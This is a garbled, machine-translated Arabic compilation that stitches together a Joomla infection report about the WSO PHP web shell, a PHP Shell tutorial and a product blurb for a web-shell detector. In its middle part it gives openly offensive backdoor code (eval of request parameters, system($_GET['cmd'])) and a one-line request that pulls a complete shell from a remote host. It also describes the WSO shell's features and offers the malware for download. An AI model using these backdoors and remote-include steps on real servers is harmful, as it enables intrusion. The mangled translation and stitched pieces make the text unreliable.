كما يساعد HUSTER HUST HUSTER على البحث عن قذائف الويب الضارة. Script RNR SHELT الخبيثة - حيث تنمو الساقين من ما هي قذيفة الويب

وجدت WSO الضارة PNR Shell-Script /Librorseys/simplepie/IDN/OPENIDOPENID.PHP (الموقع على Joomla! 3). على ال هذه اللحظة تحددها فقط من قبل بعض مكافحة الفيروسات مثل JS / SARS.S61، PHP: فك التشفير، Trojan.html.agent.vsvbn، php.shell.shell.unclassed.359.unofficial.

في واحد "جميل" (وهو شخص ما)، أحد أجناحنا (http://ladynews.biz)، نتيجة لمسح موقعك، استضافة مكافحة الفيروسات، تلقى رسالة مثل هذه الرسالة:

كشف تثبيت الملفات ذات المحتوى الضار. نوصي بشدة بالحد من الوصول إلى حساب FTP مع استخدام عناوين IP فقط، وكذلك الاستفادة حماية مكافحة الفيروسات للتحقق من الحساب للفيروسات. اقرأ توصيات سلامة المقال وحماية القرصنة لمنع إعادة الإصابة.

بالطبع، تم اقتراح التعامل مع هذا العار، المسح الضوئي لمكافحة الفيروسات العادية CLAMAV، مع مجموعة من قواعد بيانات مكافحة الفيروسات افتراضيا، لم تعطي نتيجة إضافية.

في وقت بدء هذه القصة (2015-10-23)، كان هذا البرنامج النصي للقذيفة الفيروسية غائبة في قاعدة بيانات مكافحة الفيروسات لمعظم مكافحة الفيروسات بما في ذلك "الوحوش" مثل كومودو، DRWEB، ESET-NOD32، GDATA، Kaspersky، McAfee، Microsoft و Symantec و Trendmicro وغيرها، والتي تم تأكيدها أيضا 2015-10-23 من قبل الماسح الضوئي Virustotal Online. تمكن فقط عدد قليل من الفيروسات من تحديد البرنامج النصي PHP الضار:

نتيجة التحديثات مكافحة الفيروسات تاريخ AHNLAB- V3 JS / SARS. S61 20151022 أفاست PHP: فك تشفير [TRJ] 20151023 نانو-مكافحة الفيروسات طروادة. لغة البرمجة. وكيل. VSVBN 20151023.

في نفس اليوم، أبلغت Clamav و Dr.Web عن اكتشاف برنامج نصي ضار. كلاماف لا تزال صامتة بعناد، وردت الدكتور ويب على الطرود الخبيثة في غضون 24 ساعة:

تم تحليل طلبك. تتم إضافة الإدخال المقابل إلى قاعدة بيانات Dr.Web Viral وسوف تكون متاحة في التحديث التالي.

التهديد: php.shell.354.

تم تحديد Dr.Web وعده وبعد وصول الفيروسات openidopenid.php يتم الآن محددة الآن باسم PHP.Shell.354، ولكن العديد من مكافحة الفيروسات مثل Clamav، Comodo، Drweb، ESET-NOD32، GDATA، Kaspersky، McAfee، Microsoft، Symantec، Trendmicro، إلخ . ص.، لا فكرة عن ذلك لا تملك (اعتبارا من 2015-10-25).

حسنا.، حذفنا الملف، وسوف نقوم بوقت طويل؟ حيث جاء، يمكننا فقط أن تضيع في تخمين. ماذا بعد؟ نبدأ في وضع جميع أنواع مكونات SecurityCheck وتحريف قواعد V.HTACCESS التي تحظر الوصول إلى كل شيء وكل شيء للمتضافة المشتركة (استضافة افتراضية AKA، استضافة مشتركة) إلى أكبر ليس لدينا سلطة. لكي تواصل هذه التدابير، لا أحد يعرف.

بالمناسبة حول موضوع جميع مكونات SecurityCheck ... SecurityCheck هو مكون في جملة! وحسن جدا. لكن معينة "حماية موقع مكافحة الفيروسات" تمتص تماما التي سأستمر بها أي شخص بالتأكيد، إليك مراجعة ممارسات مؤكدة حول هذا "حماية موقع مكافحة الفيروسات":

يقوم هذا المكون أيضا بإنشاء ملف Pack.tar في TMP الذي يحتوي على التكوين الخاص بك.php وأي كلمات مرور أخرى وجدت! كن حذرا.

أنه في الترجمة يعني: "هذا المكون يخلق أيضا دعم إجمالي الموقع في /tmp/pack.tar، والذي يحتوي على التكوين. PHP مع كلمات مرور قاعدة البيانات! كن حذرا "- هذا يشير إلى أن" حماية موقع الويب "من هذا المكون لا رائحة، والتي يجب أن تجلب ضحية أيضا لفكر طرق تغيير طرق الدليل / السجلات، / TMP، / ذاكرة التخزين المؤقت وحظر الوصول إليها.

يمكن فهم عبور هذا الرابط أن المشكلة لا تقل عن عام. تبحث هنا، نحن نفهم أن اخفاء البرنامج النصي الإملائي غير مصنوع من السينما base64_Encode / gzdeflate، مما يعني أن مكان آخر يجب أن يكون جزءا من OpenIpenID.php OpenIdeNid.php وأداء Base64_Decode. لذلك OpenIpenID.PHP هو النتيجة فقط (AKA النتيجة)، وليس السبب الذي يشتكي فيه الضحية من ذلك، من الخادم، بدأ بإرسال البريد العشوائي على نطاق صناعي من الخادم، والإزالة اليدوية للملفات الضارة لا يساعد، بعدها الضحية بالإضافة إلى استضافة NIC-RU للشكوى لا أحد آخر. قد يكون الاستضافة الافتراضية "مثيرة" جيدة جدا. حتى في كثير من الأحيان، يعمل الناس IMHO هناك من أجل S / N، وليس للفكرة، ولكن في بعض الحالات يمكن أن تكون المشكلة أعمق بكثير.

هنا على سبيل المثال، اكتشف ملف Adobe Flash حاقن Iframe ضار. أعتقد أنه ليس سرا يمكنك كتابة واجهات لتنزيل الملفات إلى الموقع وجعل العديد من الأشياء المثيرة للاهتمام مختلفة في لغة ActionScript. V.SWF ملفات الملفات ( برنامج أدوب فلاش.)، كما أظهرت الممارسة، يمكن أن تظل سنوات لا يلاحظها أحد وأن تكون الباب الأسود على الموقع ( ويعرف أيضا باسم الباب الخلفي - الباب الخلفي) من خلالها يمكن إزالتها الملفات مثل "openidopenid.php" قبل التكوين وليس دون جدوى.

ما يجب القيام به، وما مدى العثور على آلاف الملفات "رابط ضعيف"؟ للقيام بذلك، تحتاج إلى استخدام ما يسمى تحليل المثير وفي بعض الحالات لتطبيق قواعد بيانات مكافحة الفيروسات لمطوري الطرف الثالث. يجب أن تؤخذ في الاعتبار أن التحليل غير الجرائع، اعتمادا على إعداداته، يمكن أن يعطي الكثير من الإيجابيات الخاطئة من عند استخدام التوقيعات الفيروسية الإضافية من مطوري الطرف الثالث.

حيث تحصل على قواعد بيانات مكافحة الفيروسات لمطوري الطرف الثالث؟ على سبيل المثال، توجد قواعد بيانات مع توقيعات مكافحة الفيروسات من مطوري الطرف الثالث ل Clamav، يمكنك الاحتفال مجانا في العناوين: www.securiteinfo.com، malwarepatrol.net، rfxn.com. كيفية استخدام هذه قواعد مكافحة الفيروسات الإضافية؟ سيكون تماما قصة أخرى. يمكنك فقط القول أن قواعد بيانات إضافية لمكافحة الفيروسات للصفوف من CLAMAV من RFXN.COM (مشروع LMD Project (الكشف عن البرامج الضارة LINUX)) تهدف إلى العثور على ضار على وجه التحديد في تطبيقات الويب ويعطي نتائج أكثر نجاحا. يعلن RFXN.com أيضا أن 78٪ من التهديدات التي ترد طباعتها في قاعدة بياناتها لا يتم تعريفها بأكثر من 30 من فيروسات تجارية، والأرجح أنها كذلك.

لذلك ... ما الذي أنهى القصة باستخدام برنامج نصي rnr-shell الخبيثة openidopenid.php؟

تقرر أن أسهم قواعد بيانات مكافحة الفيروسات الإضافية ل Clamav من Malwarepatrol.net و RFXN.com، قم بتنزيل نسخة احتياطية من ملفات الموقع نعم، قم بمسحها محليا، وهنا نتيجة المسح:

$ clamscan / ladynews.biz / biz / game_rus.swf: mbl_647563.UNOFFICIAL وجدت / .. farmfrenzy_pp_rus.swf: mbl_647563.wefficial وجدت / .. / beachpartycraze_rus.swf: mbl_2934225.ufficial وجدت /. MBL_647563.UNOFFILIAL وجدت / .. / loader_rus.swf: mbl_647563.UNOFFICIAL موجود ----------- ملخص المسح الضوئي ----------- الفيروسات المعروفة: 4174348 نسخة المحرك: 0.98.7 الدلائل المسماة: 3772 الملفات الممسوحة ضوئيا: 18283 الملفات المصابة: 5 إجمالي الأخطاء: 1 البيانات الممسوحة ضوئيا: 417.76 ميغابايت قراءة البيانات: 533.51 ميغابايت (نسبة 0.78: 1) الوقت: 1039.768 ثانية (17 م 19 ق)

/ librurseys/simplepie/idn/openidopenid.php. كما تمت إزالة ملفات .swf المذكورة أعلاه، ولكن هل هناك مشكلة؟ لا يزال من الصعب القول، - حفر أكثر ...

من الإصدار فك التشفير من الملف / librurseys/simplepie/idn/openidopenid.php. (http://pastebin.com/wrlrlg9b)، والنظر في Define الثابت ("WSO_Version"، "2.5")؛ يصبح من الواضح أن هذا منتج يسمى WSO. شبكة مخيفة صغيرة لكلمة WSO، هذه هي النتائج:

لم يكن الموضوع طويلا جديدا، حسنا، نأخذ في ترجكس الأسنان، نستمر في تسريع ملفات الموقع والكشف عن: خطأ في فتح دليل "/ الصفحة الرئيسية / المستخدم / المكتبات / Joomla / Cache / Controller / Cache": المعوقين

نعم، ها أنت s.ko أين سددت! نحن ننظر إلى الحق في الدليل، والتي يجب ألا تكون افتراضيا، \u003d chmod 111 (AKA أداء للمالك / المجموعة / الكل). وبالتالي، فإن شيئا ما يجلس في مكان ما ويعمل نفسه في الفهارس يختبئون أنفسهم حتى من الفيروسات chmodami 111.

بعد تثبيت كتالوج ChMOD 551 ونظر إلى الداخل، تم اكتشافه / libruresurse/joomla/cache/controller/cache/cache/langs.php., مصدر الذي تم إبرة هنا: http://pastebin.com/jdtwpxjt - الكتالوج / المكتبات / جملة / ذاكرة التخزين المؤقت / تحكم / ذاكرة التخزين المؤقت نحن نحذف.

ممتاز، الآن نحن نضع من أجل جميع الملفات والكتالوجات:

# التغيير الشامل للحقوق (chmod) على الملفات في الدليل. / dirname والكامن Find / home / المستخدم / public_html -type f -exec chmod 644 () \\؛ # التغيير الجماعي للحقوق (chmod) على ج. / dirname والكامن Find / home / المستخدم / public_html -type d -exec chmod 755 () \\؛

نكرر مرة أخرى اختبار مكافحة الفيروسات مع قواعد Clamscan /ladynews.biz إضافية، ولكن كل شيء نظيف.

كرر البحث عن ملفات Regxxer وحاول البحث عنه الكلمات الدالة Openidopenid، OpenID أو WSO -، ونحن نأتي إلى استنتاج مفاده أن P. Zdez تبين أنه أكثر بكثير وأعمق:

  • - لا ينبغي أن يكون هنا، إليك مصدرها: http://pastebin.com/jyeizy9g
  • /administrator/components/com_finder/controllers/imagelist.php. - لا ينبغي أن يكون هنا، وهنا مصدر: http://pastebin.com/0uqdrmgv
  • / Administratorer/components/Com_users/Tables/CSS.PHP. - لا ينبغي أن يكون هنا، هنا هو المصدر الخاص به: http://pastebin.com/8QNTSMA
  • / Administratoratorrator/templates/hathor/html/com_contact/contact/toolbar.trash.html.php. - لا ينبغي أن يكون هنا، هنا هو المصدر الخاص به: http://pastebin.com/ctvuzsiz
  • oncomponents/com_jce/ditor/tiny_mce/plugins/link/img/manager.php. - لا ينبغي أن يكون هنا، هنا هو مصدره: http://pastebin.com/2nwtncxx
  • /libroryes/joomla/application/web/router/helpsites.php. - لا ينبغي أن يكون هنا، وهنا مصدر: http://pastebin.com/anhxyvl9
  • /plugins/system/ytshortcodes/xml.php. - لا ينبغي أن يكون هنا، هنا هو مصدرها: http://pastebin.com/gnmsdfc9
  • / templates/index.php - لا ينبغي أن يكون هنا، هنا هو مصدرها: http://pastebin.com/ghbmef2t

/administrator/components/com_admin/index.php. وربما كانت / Templates/index.php هي البرامج النصية الإدخال التي تم فيها تنفيذ التعليمات البرمجية الرئيسية باستخدام دالة Eval () التي لم ينصح باستخدامها حيث تم استخدامها أيضا:

حسنا، منطق إخفاء التعليمات البرمجية الضارة واضحة. الآن، إذا بحثنا عن التصميم "Eval ($"، فسوف نجد الكثير من الأشياء المثيرة للاهتمام:

  • /administrator/components/com_admin/sql/updates/postgresql/php.php. - http://pastebin.com/grhvxt5u.
  • / كمنتس /Com_Kunena/template/blue_eagle/media/iconsets/buttons/bluebird/newsfeed.php. -
  • oncomponents/com_mailto/helpers/index.php. -
  • oncomponents/com_users/views/login/file.php. -
  • / كمنتس /Com_users/Controller.php. - مصابة ويتطلب الاستبدال!
  • /includes/index.php -
  • / libruresurse/joomla/string/wrapper/section.php. -
  • / librurses/legcy/access/directory.php. -
  • / librurseys/nextend/javascript/jquery/inputfilter.php. -
  • / librurses/nextend/nextslider/admin/views/sliders_slider/tpl/config_tinybrowser.php. -
  • / librurseys/xef/assets/less/admin.frontpage.php. -
  • /media/Ditors/codemirror/mode/rust/alias.php. -
  • /Modules/mod_kunenalates/language/zhh-tw/smtp.php. -
  • /Modules/mod_kunenalogin/language/de-de/xul.php. -
  • /plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/credits.php. -
  • /templates/sj_news_ii/html/mod_sj_contact_ajax/toolbar.messages.php. -

لا يتم نشر جميع البرامج النصية الأخرى من الفيروسات الأخرى على pastebin.com لمدة 24 ساعة فقط 10 منشورات مسموح بها. بشكل عام، يتعين حذف النظام تقريبا:

نعم، لقد نسيت تقريبا، - قبل البدء في إزالة البرامج النصية الخبيثة، لن يمنع إضافة v.htaccess عدة قواعد تحظر الوصول المباشر إلى أي ملفات any.php في أي دلائل، ولكن السماح بملفات الجذر فقط / أو /index.php و / المسؤول / أو _administrator/index.php - وهذا سيؤدي إلى بارس في المهاجم المعارض الوصول إلى البرامج النصية الإملائية الواردة المخفية في أدلة النظام المختلفة:

UP 2015-10-28: حسنا، ماذا؟ هل سبق لك الاسترخاء؟ إنه باكر جدا...

لا تزال الآن تبدو في مجال ملفات الموقع الملفات الثنائيةأي في المحرك يجب ألا يكون في أمي:

find / mypath / -executable -type f البحث / mypath / -type f -perm -u + x find / mypath / -type f | ملف Xargs |. Grep "\\: \\ * البيانات $"

الذي يبحث - سوف يجد دائما (الملفات الثنائية):

  • /Modules/mod_p30life_extenly_calc/tmpl/accordian.pack.js.
  • /IMages/STories/Audio/34061012-B1BE419AF0B9.MP3.
  • /libruresys/xef/sources/folder/navigation.php.
  • / librurseys/joomla/application/web/application.php.
  • / librurses/joomla/document/json/admin.checkin.php.
  • / librurses/nextend/assets/css/licenctionses.php.
  • / libruresurse/fof/config/domain/toolbar.categories.html.php.
  • / librurses/fof/form/field/client.php.
  • / librurseys/phputf8/sysinfo_system.php.
  • oncomponents/com_mobilejoomla/index.php.
  • / كمنذر/com_mobilejoomla/sysinfo_system.php.
  • /كتينتس /index.php.
  • / تكافل/com_banners/sysinfo_config.php.
  • /Components/Com_Kunenena/views/home/admin.checkin.php.
  • /Components/com_jce/tino_mce/plugins/source/js/codemirror/toolbar.checkin.php.
  • oncomponents/com_jce/plugins/colorpicker/admin.cache.php.

مناسب

أين تأتي الساقين من هذه العدوى، لم يكن من الممكن تحديد ما إذا كانت الضعف الحرج الذي تم العثور عليه مؤخرا في المحرك مما يتيح لك أداء حقن SQL وزيادة الامتيازات، ما إذا كانت المذكورة أعلاه المذكورة لاحظت كملفات .SWF الخبيثة، أو لا تزال لم يتم اكتشاف مشكلة عدم الحصانة حتى الآن في أحد مكونات الطرف الثالث أو المكونات الإضافية، أو استضافة ويب افتراضية ثانوية، - لا يزال السؤال مفتوحا؟

حاليا، يتم تنظيف الملفات الضارة المكتشفة، يتم إعادة تحميل ملفات المحرك تماما، ويتم بناء المارزات بواسطة قواعد V.HTACCESS ... من لديه الوقت والذين يهتمون بجمع معا وسلس هذه المجموعة من القرف يمكنك تنزيل WSO-PHP -shell-in-joomla.zip - جميع ملفات RNR الخبيثة المذكورة أعلاه، كلمة المرور من الأرشيف: www.sype

المجموع: لا يحدث بارابانيا كثيرا، وأي مكافحة فيروسات مجاني أو تجاري مع الاستدلال له، إلى جانب قواعد توقيع إضافية، وليس panacea. وبالتالي، فإن أي فيروسات مضادة للفيروسات هي أداة قديمة لحماية بيئة متعددة اللاعبين النشطة ومنع التهديدات المختلفة غير المعروفة، وهي طرق حماية باراريويد، على سبيل المثال: الافتراضية، Selinux، Linux Linux، بت ثابت، Ecryptfs، إلخ!

  • التهديد: WSO PHP ويب شل
  • الضحية: ladynews.biz.

ليس هذا المقال، ولكن كثير سيكون مفيدا. لذلك، اخترقت لوحة الإدارة، ونحن في النهاية تمكننا من تدخين مثل هذا الرمز في مكان ما، على سبيل المثال:

إذا (ISSET (طلب $ _ طلب ["E"])) Eval (Stripslashes ($ _ طلب ["E"])؛


أو ببساطة:

تأكيد (Stripslashes (طلب $ _))؛


stripslashes في هذه الحالة، حصريا لتجاوز magic_quotes \u003d on
يتم إدراج الكثيرين

النظام ($ _ احصل على ["CMD"])

وغيرها من الاكتشافات، ولكن كل شيء أكثر من اللازم، في الواقع، كل شيء أسهل. لذلك، قمت بإدراج هذا الرمز في مكان ما (في faq.php، أو لديك بالفعل ببساطة كتابة مثل هذا الخنفساء في مكان ما في أعماق نصوص الخادم).
أولئك. نتيجة لذلك، فإنك على سبيل المثال حقق صحة هذا الرابط:

http: //localhost/user.php؟ e \u003d phpinfo ()؛


وبعد ذلك، الكثير من المبتدئين. على الفور السؤال التالي - ماذا تفعل بعد ذلك؟
ودعونا نلقي نظرة على هذا phpinfo الذي أطلقناه، والنقطتين الرئيسين الذي سنهتم بهذا الوضع:

السماح_url_fopen.
السماح_url_include.

السماح_url_include.

نعم، القصدير، بالطبع، ولكن، كقاعدة عامة، إيقاف.

بقايا

وهو، كقاعدة عامة. كيف يمكننا استخدام هذه الفرصة، تركها بتهور من قبل المشرف، حتى لا تستحم خاصة (عدم البحث عن مجلدات متوفرة على السجل وما يشبه الهراء لمعرفة وعدم ملء القذيفة على الإطلاق، لكنني أحب الصعود على الخادم). نعم، بسيط جدا. اذا كان

السماح_url_fopen \u003d on.

ولديك رمز يزيل على الأقل فكر في أنك قد قرأت بالفعل جميع التكوينات، دمج كل ما تحتاجه، إلخ. (لا تخلط بين "العرف"، فقط ما الذي يمكنني قراءته)

خذ آخر قذيفة من العميق الصفيح محجر العين.، إزالة السطر الأول:

+
نحن نزيل الأخير
+
يمكنك حذف كلمة المرور، شل لا تملأ، فقط استخدم، وليس المغادرة

الحفاظ على أي مضيف كما bla_bla.txt. (نفس NAROD.RU مناسب تماما) أو في شكل صورة على خدمة مشاركة الملفات توفر روابط مباشرة إلى القفز للمحتوى وجعل مثل هذا الطلب:
الرمز:

http: //localhost/user.php؟ a \u003d eval (file_get_contents ("http://site.ru/bla_bla.txt")؛


كل شىء. لديك قذيفة كاملة دون تأثير مادي على الخادم مع جميع الاحتمالات المعتادة للقذيفة. شكرا للاهتمام
ملاحظة: اختبارها على WSO2.4 ( wso2_pack.php.)

وصف شل:
تفويض
معلومات الخادم
مدير الملفات (النسخ، إعادة تسمية، نقل، حذف، chmod، لمس، إنشاء الملفات والمجلدات)
عرض، Hexview، التحرير، Davnotad، ملف Apvead
العمل مع أرشيف البريدي (التعبئة والتغليف)
وحدة التحكم
مدير SQL (MySQL، PostgreSQL)
تنفيذ رمز PHP.
العمل مع الصفوف + البحث Hesha في القواعد عبر الإنترنت
Bindport و Beck Connect (PERL)
بحث النص في الملفات
* نيكس / ويندوز
من رقائق
antipoiskovik (فحص وكيل المستخدم إذا كان محرك البحث ثم إرجاع أخطاء 404)
تتذكر وحدة التحكم الأوامر التي تم إدخالها. (يمكنك التنقل عبرها باستخدام الأسهم الصعودية، عند التركيز على حقل الإدخال)
يمكنك استخدام Ajax
وزن منخفض (24.32 كيلو بايت)
حدد الترميز الذي يعمل فيه Shell.

توفر هذه الأداة المساعدة واجهة ويب للعمل عن بعد مع نظام التشغيل وخدماتها / الشياطين.
استخدام هذا المنتج في أغراض غير قانونية يواجه المسؤولية الجنائية.

يحتوي الأرشيف على أحدث إصدار من Shell و Toolz الصغيرة WSOMANAGER - للعمل مع قذائف.

تحميل شل:

في الآونة الأخيرة، على المساحات الهائلة للإنترنت، جئت في ذكر " قذيفة فب"قبل بضع سنوات، ساعدتني هذه الأداة في ذلك كثيرا وأريد الآن إعطاء نوع من الواجب لمطوره مارتن جيزر (http://mgeisler.net/).

ما هو الغرض من "فب شل"؟ أعتقد أن كل مبرمج ويب "متقدم"، ناهيك عن سوريا، صادفت واستخدمت SSH. يتيح لنا SSH الحصول على الوصول عن بعد إلى الخادم وإجراء أمر Shell عليه (حسنا، هناك كل أنواع الأوامر مثل المشي على الكتالوجات هناك، وصولا، نقل، حذف ونسخ الملفات، تشغيل السيناريوهات وجميع الأداة المساعدة )، كما لو أن السلك الخاص بمراقبتك من وحدة النظام تمتد إلى أحجام لا تصدق والوصول إليها بالفعل، إلى الخادم المضيف. يجب أن أقول أنه من الممكن من خلال SSH إلى الأنفاق و X-Graphics، صورة سطح المكتب، تظهر تطبيقات نافذة التشغيل، ولكن من الواضح أنها ليست لخوادم الويب.

باختصار، إذا لم يكن لديك SSH على الاستضافة، فما "ما هو غير جيد في المملكة الدنماركية". الحد الأقصى هو، غالبا ما يتم تعطيل SSH الافتراضي في موقعك "الطازج"، ويستغرق الأمر بعض الوقت للهدوء مع خدمة الدعم حتى كسب SSH. هذا هو بالضبط ما حدث في أمسية الشتاء البعيدة. كنت بحاجة إلى نقل الموقع بشكل عاجل من جهاز واحد إلى آخر، خلال أي مشاكل نشأ، اعتدت الوصول إلى تسمية المعجون على سطح المكتب، بحيث يكون هناك "داخل" في المريض. عفوا، ولم يتم تنشيط دعم SSH. كيف تكون؟ إذا تم إغراءك بما فيه الكفاية في البرمجة على بعض اللغات هناك، فلن يكون من الصعب كتابة برنامج نصي صغير ينفذ المهمة اللازمة. أفتح جوجل وتشغيلها حول زوج الروابط، وجدت ذكر لشركة PHP Shell. في كلمة واحدة، ذهبت إلى المنزل في الوقت المحدد.

في الحقيقة، كنت محظوظا جدا أن لدينا ما يكفي من تلك الفرص المقطوعة للعمل مع قذيفة، والتي قدمت لي مع قذيفة فب - لا تزال تقليده.

في قلب قذيفة PHP تستخدم وظيفة PHP - Proc_open. تبدأ هذه الميزة في بعض الأمر ويفتح تدفقات الإخراج الإدخال لإدخال بعض المعلومات في تطبيق (تقليد الإدخال اليدوي كما كانت على لوحة المفاتيح) وعرض نتائج العمل (إذا كنت تعرف أن الأنابيب التي نتحدث عنها) وبعد في الواقع، فإن وظيفة ProC_OPEN هي نسخة محسنة ومززعة من ميزات EXEC أو ميزات النظام. أولئك الذين أطلقوا الحقيقة فقط البرنامج، ولم يسمح لك بالتفاعل معها، يجب أن يكون لديك فورا في معلمات سطر الأوامر لتحديد جميع البيانات الخاصة بالعملية التي تحتاجها. يسمح لك Proc_open بإنشاء أنابيب مرتبطة بكب PHP الخاص بك، ويمكنك مطابقة إدخال البيانات في البرنامج وقراءة نتائج تشغيلها. لعشاق العروض المجانية، سأقول على الفور:

"لا، مع قذيفة PHP، لن تكون قادرا على الوصول إلى SSH."

الحقيقة هي استضافة استضافة مجانية أو رخيصة للغاية، عليك تشغيل PHP في وضع SAFE_MODE. لقد تعطيل عدد من الوظائف، بما في ذلك Proc_open.

"لا، مع phpshell، لن تكون قادرا على العمل مع برامج تفاعلية."

يخبرنا جوهر الويب أنه من غير الممكن تشغيل برنامج معين استمر في العمل على خادم بعيد، والذي سيستمر في العمل والسماح لنا بإدخال البيانات وإخراجها لعدة طلبات HTTP منفصلة.

"لا، لا يمكنك الوصول إلى جميع البرامج والملفات والمجلدات على الخادم."

يعمل البرنامج النصي إما نيابة عن Apache ثم يقتصر قدراته فقط على الحق في جعل حساب Apache. إما كخيار إذا تم استخدام Suexec في الاستضافة (http://en.wikipedia.org/wiki/suexec)، فستتز على حقوقك مع حساب حساب البرنامج النصي PHP قيد التشغيل.

لنفترض أنه لم يمنعك، وأنت قمت بتنزيله وتفكيك الأرشيف على الخادم الخاص بك إلى المجلد، على سبيل المثال، phpshell. إذا قمت بالدخول في شريط عنوان المتصفح "بطريقة ما يسمى - موقع الويب الخاص بك / phpshell / phpshel.php"، فسيطلب منك تقديم أنفسهم، وأدخل الاسم وكلمة المرور - بالطبع، هذه ليست بيانات الاعتماد التي تلقيتها من هوس

لذلك تحتاج إلى تكوين حقوق الوصول: من يمكنه الوصول إلى Shell من خلال هذه الأداة المساعدة. للقيام بذلك، في ملف Config.php، ابحث عن قسم المستخدمين وإضافة اسم مستخدم وكلمة مرور له على النحو التالي:

vasyano \u003d سر.

إذا كنت مرتبكا بحقيقة أن كلمة المرور يتم تعيينها في النموذج المفتوح، فعندئذ باستخدام ملف pwhash.php، يمكنك معرفة رحلة كلمة مرور MD5 وفي ملف CONFIG.PHP سيتم تخزينه

الآن نجعل إدخال إدخال وإدخال الإطار، حيث في أسفل النافذة، ندخل الأمر، انقر فوق "تشغيل"، ثم يتم عرض نتيجة تنفيذها في مركز نافذة الصفحة

في هذا كل شيء، ربما يساعدك phpshell بطريقة أو بأخرى.

تعني معظم الهجمات على موارد الشركات إدخال قذائف الويب - التعليمات البرمجية التي تجعل من الممكن إدارة الأجهزة المتأثرة من خارج الشبكة. Hunter Antishell Web Shell Hunter هو عامل حماية يتضمن مجموعة كاملة من الآليات لتحديد قذائف الويب.




ويب شل هو برنامج نصي يتم تحميله على الخادم ويقدم إلى الإدارة عن بعد. يصبح خبيضا فقط عندما يتحكمون في المهاجم. وفي هذه الحالة، يمثل تهديدا خطيرا.

لا يجب توصيل الخادم المصاب بالإنترنت - يمكن أن يكون موجودا في الشبكة الداخلية للشركة. ثم يتم استخدام شل على الويب للوصول إلى المضيفين الآخرين مع تطبيقات أو معلومات حرجة.

لكتطبيق قذائف الويب، يتم تطبيق أي لغة مدعومة من قبل خادم الويب الهدف. في الممارسة العملية، غالبا ما تستخدم PHP و ASP، لأنها الأكثر شعبية. نشر البرامج الضارة أيضا على بيرل، روبي، بيثون و UNIX قذيفة.

يتم تثبيت قذائف الويب معيارا إلى حد ما للتطبيقات الضارة في الطريقة - باستخدام نقاط الضعف في برنامج CMS أو خادم الويب. بعد ذلك، يعملون ك Backdoator، مما يسمح للمهاجم بإجراء أوامر تعسفية على جهاز بعيد، بما في ذلك إدخال برامج قابلة للابتزاز أو بدء الهجمات على خوادم أخرى.

الخطر الخاص لقذائف الويب هو بساطته النسبية. تعديل البرنامج النصي، الذي ينتج عنه برنامج آخر، هو المهمة التي يمكن للمبتدئين التعامل معها. بسبب هذه الجودة، فإن اكتشاف قذيفة الويب مع مرافق مكافحة الفيروسات القياسية أمر صعب.

مثل البرامج الضارة الأخرى، يمكن تحديد قذائف الويب لعدد من العلامات الخارجية. ومع ذلك، يمكن أن تتعلق جزء كبير منهم أيضا بالملفات القانونية تماما، لذلك يجب النظر في أي مؤشرات مشبوهة في المجمع، وتحليل الصورة بأكملها، وليس شظاياها.

يمكن أن تكون المؤشرات المحتملة لوجود قذيفة الويب على الخادم:

  • فترات تحميل عالية بشكل غير طبيعي على الخادم؛
  • وجود ملفات مع الطابع الزمني المشبوه (على سبيل المثال، في وقت لاحق من وقت تحديث البرنامج الأخير)؛
  • توفر الملفات المشبوهة في الأماكن المتاحة من الإنترنت؛
  • وجود الملفات التي توجد فيها مراجع إلى CMD.EXE، EVEN وما شابه؛
  • توافر إذن مشبوه من الشبكة الداخلية؛
  • وجود الملفات التي تولد حركة المرور غير واضحة من قبلها.

من الواضح أن "دليل" تحليل في هذه الحالة، إن أمكن، يتطلب الكثير من الموارد البشرية، لذلك يتم حرمان استخدامه من أي جدوى عملية. يسمح لك Hander Web Shell Hunter، التي طورتها شركة Garhi Technology، أتمتة هذا الإجراء، وتجادل مطوريها بأنه مضمون للتعرف على جميع قذائف الويب المعروفة.

يعتمد التطبيق على التقنيات التالية:

  • البحث عن طريق الكلمات الرئيسية. يتم فحص جميع الملفات للكلمات والأوامر التي قد ترتبط بهجوم؛
  • تحليل الإشارات: ابحث عن توقيعات قذائف الويب المعروفة؛
  • تحليل أطول خطوط. في كثير من الأحيان، يتم تشفير التعليمات البرمجية الضارة بطريقة تجاوز البحث عن طريق الكلمات الرئيسية. هذا يجعل صفوف من التعليمات البرمجية لفترة طويلة بشكل خاص، مما يسمح لهم بالكشف عنها؛
  • حساب شانون الانتروبيا في التعليمات البرمجية المصدر. يتم تعيين تصنيف كل صف من التعليمات البرمجية، على أساسه يمكن للمرء أن يحكم على درجة التهديد؛
  • ابحث عن رمز ضار من خلال طريقة الصدفة الفهرسة.

يؤدي هذا أحد المشكلات الرئيسية للكشف عن قذائف الويب المرتبطة بمجموعة متنوعة من اللغات المستخدمة وإمكانية تعديل بسيط. في عمل هنتر شل على شبكة الإنترنت Antishell، لا تؤثر هذه العوامل في أي مكان، مما يجعلها عالمية وتتيح لك استخدامها لحماية أي خادم.

نظرا لأن الملفات التي لم يتم تغييرها بعد المسح الضوئي السابق مستبعدة من المعالجة، فإن Antishell Web Shell Hunter لا يخلق حمولة عالية على الخادم. بالإضافة إلى ذلك، يقلل هذا النهج من وقت الفحص.

في الوقت نفسه، يمكن للمسؤولين ضبط وقت الاختيار بشكل مستقل، استنادا إلى تقلبات الحمل اليومية على الخادم. إذا لزم الأمر، يتم استبدال الوضع اليومي بأسبوعي أو شهري، مما يسمح لك بتحسين تشغيل النظام بأكمله.

يكتشف البرنامج الملفات التي تحتوي على رمز شل على الويب، وتوفر مسؤول النظام مع معلومات كاملة على الكائن: تاريخ ووقت الإبداع، اسم المالك، يمين وهلم جرا.

كل هذه البيانات (ولكن ليس الملفات نفسها) تدخل أيضا مركز عميل مطور العملاء، والتي، على أساسها، يمكن أن توفر الدعم لمعالجة الحادث ودراسة عواقبها. يمكن للعملاء الذين وقعتهم الخدمة المدفوعة استخدام الأداة المساعدة الخاصة لتنزيل الملفات المصابة نفسها لمزيد من التحليل.

يتم إرسال الرسائل حول الكائنات الموجودة إلى مسؤول النظام عن طريق البريد الإلكتروني. ليس لديه حاجة إلى اتباع العملية شخصيا.

حتى الآن، Hunter Interishell Web Shell Hunter هي الأداة الوحيدة التي تركز على اكتشاف قذائف الويب. تتضمن عدد من تطبيقات مكافحة الفيروسات وظيفة مماثلة، ولكن فقط في شكل خيار إضافي، وهو غير نشط بشكل افتراضي. كقاعدة عامة، تستند فقط إلى تحليل إنذار، لذلك أترك فعاليتها الكثير مما هو مرغوب فيه.

